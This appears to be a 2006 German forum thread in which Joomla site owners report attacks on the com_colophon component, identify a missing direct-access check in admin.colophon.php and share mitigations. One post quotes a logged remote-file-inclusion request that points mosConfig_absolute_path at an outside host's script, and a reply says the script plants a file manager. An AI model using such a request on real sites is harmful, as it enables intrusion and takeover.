+ Antworten
Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 10 von 15

Thema: Hinweis/Frage zu com_colophon

  1. #1
    War schon öfter hier
    Registriert seit
    24.10.2005
    Beiträge
    207
    Bedankte sich
    20
    Erhielt 62 Danksagungen
    in 52 Beiträgen

    Standard Hinweis/Frage zu com_colophon

    Guten Abend,

    vielleicht ist es Panik, vielleicht aber auch übertriebene Vorsicht. In den letzten 12 Stunden wurde von den verschiedenensten Quellen über Google die Anfrage "inurl:"/com_colophon/" " gestartet. Zum Spaß macht man das nicht wirklich, kann zwar vorkommen, aber nicht von Google.com.tr, Google****, Google.de und Google.com in so kurzer Zeit. Gibt es in dieser Komponente auch noch ein Fehler?

    Im Augenblick (29.07.06, 22:00Uhr) kann man diese Suchanfrage auf meiner Seite noch sehen (last_referer).

    Wenn es ein Fehlalarm war oder das Thema hier schon 1000 mal durch ist, sorry.


    Edit: Scheint gerade ne populäre Komponente zu sein, jetzt kommen auch noch Suchanfragen von Google.com.eg und Google.it dazu.



    Mit freundlichem Gruß


    Sven Soltmann
    Geändert von soltmann (29.07.2006 um 21:02 Uhr)

  2. #2
    War schon öfter hier
    Registriert seit
    19.09.2005
    Beiträge
    114
    Bedankte sich
    6
    Erhielt 40 Danksagungen
    in 36 Beiträgen

    Standard Kann ich bestätigen

    In der letzten Nacht gab es auch auf meiner Seite an die 100 Aufrufe bezüglich colophon.
    Zuerst über Google, danach waren auch gezielte Aufrufe dieser Komponente vorhanden von allen Möglichen Orten (Türkei, Brasilien usw.)!
    Bis jetzt ist nichts passiert, aber etwas beunruhigend ist es schon.

  3. #3
    War schon öfter hier
    Registriert seit
    24.10.2005
    Beiträge
    207
    Bedankte sich
    20
    Erhielt 62 Danksagungen
    in 52 Beiträgen

    Standard

    Irgendwas passiert aber anscheinend doch, siehe hier:
    http://forum.joomla.org/index.php/to...html#msg416601
    Schade das mein Englisch so schlecht ist.


    Die "Herstellerwebseite" http://www.schoolastech.com/ ist leider derzeit auch nicht errreichbar.

    Ich habe die Komponente erstmal unbrauchbar gemacht (hoffentlich).


    Mit freundlichem Gruß


    Sven Soltmann

  4. #4
    b2m
    b2m ist offline
    Hat hier eine Zweitwohnung Avatar von b2m
    Registriert seit
    19.02.2006
    Beiträge
    1.405
    Bedankte sich
    37
    Erhielt 466 Danksagungen
    in 359 Beiträgen

    Standard com_colophon 1.2.0 hacked

    Hi
    Das lässt sich ganz einfach erklären:
    Die admin.colophon.php ist buggy.
    Da fehlt die Überprüfung ob die Datei auch von Joomla eingebunden wird => man kann die Datei direkt aufrufen und eure Installation hacken... zumindest habe ich so drei Installationen verloren *amaufräumenbin*.

    Es fehlt da ein
    Code:
    // no direct access
    defined( '_VALID_MOS' ) or die( 'Restricted access' );
    im top der Seite.

    ciao B2M
    Geändert von b2m (30.07.2006 um 09:53 Uhr)

  5. Erhielt Danksagungen von:


  6. #5
    Gesperrt
    Registriert seit
    03.05.2005
    Ort
    joomlers.de
    Beiträge
    4.695
    Bedankte sich
    124
    Erhielt 989 Danksagungen
    in 941 Beiträgen

    Standard

    die install. und uninstall.colophon.php in administrator/components/com_colophon gleich mitsichern.

  7. #6
    War schon öfter hier
    Registriert seit
    24.10.2005
    Beiträge
    207
    Bedankte sich
    20
    Erhielt 62 Danksagungen
    in 52 Beiträgen

    Standard

    Damit sollte man das Modul Colophon auch zuden unsicheren Module zählen oder ausdrücklich auf die Änderung hinweisen.
    Vielen Dank

    Edit: siehe Amarok, er war einfach schneller.


    Mit freundlichem Gruß


    Sven Soltmann

  8. #7
    Kommt häufiger vorbei Avatar von Lucretia
    Registriert seit
    04.05.2005
    Ort
    Hamburg
    Alter
    39
    Beiträge
    431
    Bedankte sich
    34
    Erhielt 5 Danksagungen
    in 5 Beiträgen

    Standard

    ja, meine Seite ist heute auch gleich 2 Mal (!!!) gehackt worden
    Laut Logfiles scheint es an Colophon zu liegen.
    Hab die Komponente erstmal rausgeschmissen, ist ja zum Glück nicht "lebenswichtig".

  9. #8
    War schon öfter hier
    Registriert seit
    19.09.2005
    Beiträge
    114
    Bedankte sich
    6
    Erhielt 40 Danksagungen
    in 36 Beiträgen

    Standard und es geht weiter mit den Angrifen

    Habe die Komponente auch schon deinstalliert, der Admin-Bereich ist zusätzlich mittels .htaccess geschützt, so konnte kein Schaden angerichtet werden.

    Weitere Angrife gibt es auf folgende Komponente:
    com_mgm, habe ich zwar nicht installiert, aber schon Zugriffe nach dem selben Muster wie auf die com_colophon erhalten.

  10. #9
    Kommt häufiger vorbei Avatar von Lucretia
    Registriert seit
    04.05.2005
    Ort
    Hamburg
    Alter
    39
    Beiträge
    431
    Bedankte sich
    34
    Erhielt 5 Danksagungen
    in 5 Beiträgen

    Standard

    hm, nachdem ich gestern sämtliche Bestandteile von Colophon gelöscht habe, bekomme ich laut Logfiles immer noch Anfragen nach

    "GET /mtg/component/option,com_colophon/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://xxx/list.txt? HTTP/1.1" 200 24010 "-" "libwww-perl/5.805"

    Sind das nur Hackversuche, oder muss ich mir Sorgen machen? Was kann dieses Script auf xxx ? Hat da jemand Ahnung von?
    Meine Programmierkenntnisse reichen leider nicht aus, um den Zweck dieses Scriptes zu verstehen.
    Wär super, wenn mir diesbezüglich jemand weiterhelfen könnte.

    Danke!
    Geändert von Lucretia (31.07.2006 um 12:02 Uhr)

  11. #10
    headcrash
    Gast

    Standard

    Das Script ist böse, im Endeffekt installiert es Dir u.a. einen Dateimanager auf dem Space, mit dem beliebig manipuliert werden kann.

+ Antworten
Seite 1 von 2 1 2 LetzteLetzte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein